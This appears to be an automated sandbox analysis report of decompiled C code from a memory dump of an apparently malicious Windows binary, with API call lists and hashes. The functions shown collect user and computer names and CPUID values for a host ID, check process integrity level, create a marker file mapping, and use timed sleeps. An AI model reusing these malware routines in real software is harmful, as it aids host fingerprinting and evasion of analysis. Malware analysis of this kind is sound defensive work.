					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x447d26c; // 0x2cc
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x447d24c = 5;
						} else {
							_t68 = E04478D14(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x447d260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E0447A376(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E044736B1(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x447d244);
							goto L21;
						} else {
							__eflags =  *0x447d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E04476761();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x447d248);
								L21:
								L0447AF2E();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x447d238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                                          0x044751b0
                                                          0x044751c2
                                                          0x044751c5
                                                          0x044751d1
                                                          0x044751d7
                                                          0x044751dc
                                                          0x04475343
                                                          0x044751e2
                                                          0x044751e2
                                                          0x044751e4
                                                          0x044751e9
                                                          0x044751ea
                                                          0x044751f0
                                                          0x044751f3
                                                          0x044751f6
                                                          0x04475204
                                                          0x0447520f
                                                          0x04475212
                                                          0x04475214
                                                          0x04475221
                                                          0x0447522b
                                                          0x0447522d
                                                          0x04475232
                                                          0x04475237
                                                          0x04475242
                                                          0x04475242
                                                          0x04475239
                                                          0x04475239
                                                          0x04475240
                                                          0x00000000
                                                          0x00000000
                                                          0x04475240
                                                          0x0447524c
                                                          0x00000000
                                                          0x0447524f
                                                          0x04475253
                                                          0x0447525e
                                                          0x0447525e
                                                          0x04475265
                                                          0x0447526e
                                                          0x04475275
                                                          0x0447527e
                                                          0x04475281
                                                          0x04475284
                                                          0x04475289
                                                          0x0447528e
                                                          0x00000000
                                                          0x00000000
                                                          0x04475290
                                                          0x04475293
                                                          0x04475296
                                                          0x04475299
                                                          0x00000000
                                                          0x0447529b
                                                          0x044752aa
                                                          0x044752aa
                                                          0x00000000
                                                          0x044752d8
                                                          0x044752d8
                                                          0x044752dd
                                                          0x044752fc
                                                          0x044752fe
                                                          0x04475303
                                                          0x04475304
                                                          0x00000000
                                                          0x044752df
                                                          0x044752df
                                                          0x044752e5
                                                          0x00000000
                                                          0x044752e7
                                                          0x044752e7
                                                          0x044752ec
                                                          0x044752ee
                                                          0x044752f3
                                                          0x044752f4
                                                          0x0447530a
                                                          0x0447530a
                                                          0x04475312
                                                          0x0447531d
                                                          0x04475320
                                                          0x0447532b
                                                          0x0447532d
                                                          0x04475330
                                                          0x04475332
                                                          0x00000000
                                                          0x04475338
                                                          0x00000000
                                                          0x04475338
                                                          0x04475332
                                                          0x044752e5
                                                          0x00000000
                                                          0x044752dd
                                                          0x044752ad
                                                          0x044752af
                                                          0x044752b2
                                                          0x044752b3
                                                          0x044752b3
                                                          0x044752b7
                                                          0x044752c1
                                                          0x044752c1
                                                          0x044752c7
                                                          0x044752ca
                                                          0x044752ca
                                                          0x044752d0
                                                          0x044752d0
                                                          0x0447534d
                                                          0x00000000

                                                          APIs
                                                          • memset.NTDLL ref: 044751C5
                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 044751D1
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 044751F6
                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 04475212
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0447522B
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 044752C1
                                                          • CloseHandle.KERNEL32(?), ref: 044752D0
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 0447530A
                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,04475D5E,?), ref: 04475320
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0447532B
                                                            • Part of subcall function 04478D14: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05019368,00000000,?,74B5F710,00000000,74B5F730), ref: 04478D63
                                                            • Part of subcall function 04478D14: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,050193A0,?,00000000,30314549,00000014,004F0053,0501935C), ref: 04478E00
                                                            • Part of subcall function 04478D14: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,0447523E), ref: 04478E12
                                                          • GetLastError.KERNEL32 ref: 0447533D
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                          • String ID:
                                                          • API String ID: 3521023985-0
                                                          • Opcode ID: ad39759240824d4aa39b16163785783550cb42fb40d9ea5b2db1e10f99260f15
                                                          • Instruction ID: 281091d887071099708b0d1a85cea85bf26a7a6d637276241f8700ed9c4c2ed4
                                                          • Opcode Fuzzy Hash: ad39759240824d4aa39b16163785783550cb42fb40d9ea5b2db1e10f99260f15
                                                          • Instruction Fuzzy Hash: D4513EB1801228BBEF119F95DC849EEFFB9EF49720F204616E511B6250D774AA46CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0447232F, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E0447232F(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L0447AF28();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x447d2a8; // 0xb9a5a8
				_t5 = _t13 + 0x447e87e; // 0x5018e26
				_t6 = _t13 + 0x447e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L0447ABCA();
				_t17 = CreateFileMappingW(0xffffffff, 0x447d2ac, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                                          0x0447232f
                                                          0x04472337
                                                          0x0447233b
                                                          0x04472341
                                                          0x04472346
                                                          0x0447234b
                                                          0x0447234e
                                                          0x04472351
                                                          0x04472356
                                                          0x04472357
                                                          0x0447235a
                                                          0x0447235f
                                                          0x04472366
                                                          0x04472370
                                                          0x04472372
                                                          0x04472373
                                                          0x04472376
                                                          0x04472392
                                                          0x04472398
                                                          0x0447239c
                                                          0x044723ea
                                                          0x0447239e
                                                          0x044723ab
                                                          0x044723bb
                                                          0x044723c3
                                                          0x044723d5
                                                          0x044723d9
                                                          0x00000000
                                                          0x00000000
                                                          0x044723c5
                                                          0x044723c8
                                                          0x044723cd
                                                          0x044723cf
                                                          0x044723cf
                                                          0x044723ad
                                                          0x044723af
                                                          0x044723db
                                                          0x044723dc
                                                          0x044723dc
                                                          0x044723ab
                                                          0x044723f1

                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,04475C31,?,?,4D283A53,?,?), ref: 0447233B
                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04472351
                                                          • _snwprintf.NTDLL ref: 04472376
                                                          • CreateFileMappingW.KERNELBASE(000000FF,0447D2AC,00000004,00000000,00001000,?), ref: 04472392
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04475C31,?,?,4D283A53), ref: 044723A4
                                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 044723BB
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,04475C31,?,?), ref: 044723DC
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,04475C31,?,?,4D283A53), ref: 044723E4
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                          • String ID:
                                                          • API String ID: 1814172918-0
                                                          • Opcode ID: 558ec645c6b914fbcbfc6674ff89f2006695cced47ac79ca4e239d1ea5d27e86
                                                          • Instruction ID: f44a8acf4a2c6edc2b8809921da3ce24d321de2704e08a63096ccae38067afc4
                                                          • Opcode Fuzzy Hash: 558ec645c6b914fbcbfc6674ff89f2006695cced47ac79ca4e239d1ea5d27e86
                                                          • Instruction Fuzzy Hash: 4E21A572A40204BBEB21ABB4DC45FDE77A9FB44710F244166F605E72D0EAB4E907CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04479135, Relevance: 12.1, APIs: 8, Instructions: 103memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 96%
                                                          			E04479135(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x447d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E0447A6CC( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x447d2a4 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x447d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E04477306(_v8 + _v8, _t64);
							}
							HeapFree( *0x447d238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x447d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04477306(_v8 + _v8, _t64);
						}
						HeapFree( *0x447d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                                          0x04479135
                                                          0x0447913d
                                                          0x04479141
                                                          0x04479144
                                                          0x04479149
                                                          0x0447914b
                                                          0x04479150
                                                          0x04479150
                                                          0x04479156
                                                          0x04479158
                                                          0x04479165
                                                          0x044791c6
                                                          0x04479167
                                                          0x0447916c
                                                          0x04479172
                                                          0x04479177
                                                          0x04479185
                                                          0x04479189
                                                          0x04479198
                                                          0x0447919f
                                                          0x044791a6
                                                          0x044791a6
                                                          0x044791b1
                                                          0x044791b1
                                                          0x04479189
                                                          0x04479177
                                                          0x044791c8
                                                          0x044791ce
                                                          0x044791d8
                                                          0x044791da
                                                          0x044791df
                                                          0x044791ee
                                                          0x044791f2
                                                          0x044791fd
                                                          0x04479204
                                                          0x0447920b
                                                          0x0447920b
                                                          0x04479217
                                                          0x04479217
                                                          0x044791f2
                                                          0x04479222
                                                          0x04479224
                                                          0x04479227
                                                          0x04479229
                                                          0x0447922c
                                                          0x0447922f
                                                          0x04479239
                                                          0x0447923d
                                                          0x04479241

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 0447916C
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04479183
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04479190
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04475D20), ref: 044791B1
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 044791D8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 044791EC
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 044791F9
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,04475D20), ref: 04479217
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: HeapName$AllocateComputerFreeUser
                                                          • String ID:
                                                          • API String ID: 3239747167-0
                                                          • Opcode ID: 1b1aa1f9b1cc1d7573994106305391952437cbe5f3e07818f59790ae1bd922d0
                                                          • Instruction ID: 2d2427c0d7e3f86678fd5ebe2f14dee7b9a90863475622644d8b0658b8b4cb0e
                                                          • Opcode Fuzzy Hash: 1b1aa1f9b1cc1d7573994106305391952437cbe5f3e07818f59790ae1bd922d0
                                                          • Instruction Fuzzy Hash: 373117B1A00209EFFB10DFA9DC80AAEF7F9EF44244B11446AE504D7210EB34EE179B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04471A08, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E04471A08(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x447d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E0447A71F(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E0447A734(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                                          0x04471a15
                                                          0x04471a1c
                                                          0x04471a23
                                                          0x04471a37
                                                          0x04471a42
                                                          0x04471a5a
                                                          0x04471a67
                                                          0x04471a6a
                                                          0x04471a6f
                                                          0x04471a7a
                                                          0x04471a7e
                                                          0x04471a8d
                                                          0x04471a91
                                                          0x04471aad
                                                          0x04471aad
                                                          0x04471ab1
                                                          0x04471ab1
                                                          0x04471ab6
                                                          0x04471aba
                                                          0x04471ac0
                                                          0x04471ac1
                                                          0x04471ac8
                                                          0x04471ace

                                                          APIs
                                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04471A3A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04471A5A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04471A6A
                                                          • CloseHandle.KERNEL32(00000000), ref: 04471ABA
                                                            • Part of subcall function 0447A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04475595), ref: 0447A72B
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04471A8D
                                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04471A95
                                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04471AA5
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                          • String ID:
                                                          • API String ID: 1295030180-0
                                                          • Opcode ID: d34173407507bd3396dd00b0c06413e9164638a3d421549949b22a8a0d611834
                                                          • Instruction ID: f7101d3f0ccaf21336f99e1215070484ed02a928599bae6d3807846e3497a02d
                                                          • Opcode Fuzzy Hash: d34173407507bd3396dd00b0c06413e9164638a3d421549949b22a8a0d611834
                                                          • Instruction Fuzzy Hash: 47213CB5900289FFEF10DF94DC84EEEBBB9EF44304F1001A6EA11A6251D7759E46DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0447391F, Relevance: 9.2, APIs: 6, Instructions: 154memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(?), ref: 0447395A
                                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 044739DD
                                                          • StrStrIW.SHLWAPI(00000000,006E0069), ref: 04473A1D
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04473A3F
                                                            • Part of subcall function 04476F3A: SysAllocString.OLEAUT32(0447C290), ref: 04476F8A
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 04473A92
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04473AA1
                                                            • Part of subcall function 04471AE2: Sleep.KERNELBASE(000001F4), ref: 04471B2A
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                                          • String ID:
                                                          • API String ID: 2118684380-0
                                                          • Opcode ID: be758eb13ae308ab21d6d4f6971ddc6fe488f9812877b24f96b925e9cebde8e9
                                                          • Instruction ID: dce8943ed96c2d04faa4a209642153fd9bd5e9bbe6d4166a4f855bc4adda45ef
                                                          • Opcode Fuzzy Hash: be758eb13ae308ab21d6d4f6971ddc6fe488f9812877b24f96b925e9cebde8e9
                                                          • Instruction Fuzzy Hash: 4C513C75500609AFDF11CFA9C884ADAB7BAFF88744B14846AE905DB320DB35ED46CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 044712E5, Relevance: 9.1, APIs: 6, Instructions: 60sleepmemorytimeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E044712E5(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t26;
				signed int _t33;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x447d238 = _t10;
				if(_t10 != 0) {
					 *0x447d1a8 = GetTickCount();
					_t12 = E04473E69(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
							_push(0);
							_push(9);
							_push(_t23 >> 7);
							_push(_t16);
							L0447B08A();
							_t33 = _t14 + _t16;
							_t18 = E04475548(_a4, _t33);
							_t19 = 2;
							_t25 = _t33;
							Sleep(_t19 << _t33); // executed
						} while (_t18 == 1);
						if(E04474DA2(_t25) != 0) {
							 *0x447d260 = 1; // executed
						}
						_t12 = E04475BA2(_t26); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}













                                                          0x044712e5
                                                          0x044712eb
                                                          0x044712ec
                                                          0x044712f8
                                                          0x044712fe
                                                          0x04471305
                                                          0x04471315
                                                          0x0447131a
                                                          0x04471321
                                                          0x04471323
                                                          0x04471328
                                                          0x0447132e
                                                          0x04471334
                                                          0x0447133e
                                                          0x04471342
                                                          0x04471344
                                                          0x04471349
                                                          0x0447134a
                                                          0x0447134b
                                                          0x04471350
                                                          0x04471356
                                                          0x0447135f
                                                          0x04471360
                                                          0x04471365
                                                          0x0447136b
                                                          0x04471377
                                                          0x04471379
                                                          0x04471379
                                                          0x04471383
                                                          0x04471383
                                                          0x04471307
                                                          0x04471309
                                                          0x04471309
                                                          0x0447138d

                                                          APIs
                                                          • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04474EF2,?), ref: 044712F8
                                                          • GetTickCount.KERNEL32 ref: 0447130C
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,04474EF2,?), ref: 04471328
                                                          • SwitchToThread.KERNEL32(?,00000001,?,?,?,04474EF2,?), ref: 0447132E
                                                          • _aullrem.NTDLL(?,?,00000009,00000000), ref: 0447134B
                                                          • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,04474EF2,?), ref: 04471365
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                          • String ID:
                                                          • API String ID: 507476733-0
                                                          • Opcode ID: 78386e1411ef2c8ec999c1ff6c3ba76670b1e454441b8b8c0787ce60df2ad479
                                                          • Instruction ID: 9344c4abd3be8f9dab77e1290deef2973236bebc733af487a92b57a0918c5cbc
                                                          • Opcode Fuzzy Hash: 78386e1411ef2c8ec999c1ff6c3ba76670b1e454441b8b8c0787ce60df2ad479
                                                          • Instruction Fuzzy Hash: 2011CCB1A54301BFFB206BA5DC49BAA7798EB44355F00451AF985D67C0EE74FC0386A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04475BA2, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 57%
                                                          			E04475BA2(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E04476C09();
				if(_t21 != 0) {
					_t59 =  *0x447d25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x447d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x447d160(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E0447496B( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x447d2a8; // 0xb9a5a8
					if( *0x447d25c > 5) {
						_t8 = _t26 + 0x447e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x447e9f5; // 0x44283a44
						_t27 = _t7;
					}
					E0447729A(_t27, _t27);
					_t31 = E0447232F(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x447d270 =  *0x447d270 ^ 0x81bbe65d;
						_t32 = E0447A71F(0x60);
						 *0x447d32c = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x447d32c; // 0x50195b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x447d32c; // 0x50195b0
							 *_t51 = 0x447e81a;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x447d238, 0, 0x43);
							 *0x447d2c8 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x447d25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x447d2a8; // 0xb9a5a8
								_t13 = _t58 + 0x447e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x447c287);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E04479135( ~_v8 &  *0x447d270,  &E0447D00C); // executed
								_t54 = E0447888E(_t55);
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E044787AE(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E044751B0(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E04471C66(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x447d15c();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E0447A273(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}






























                                                          0x04475ba2
                                                          0x04475bad
                                                          0x04475bb0
                                                          0x04475bb3
                                                          0x04475bb6
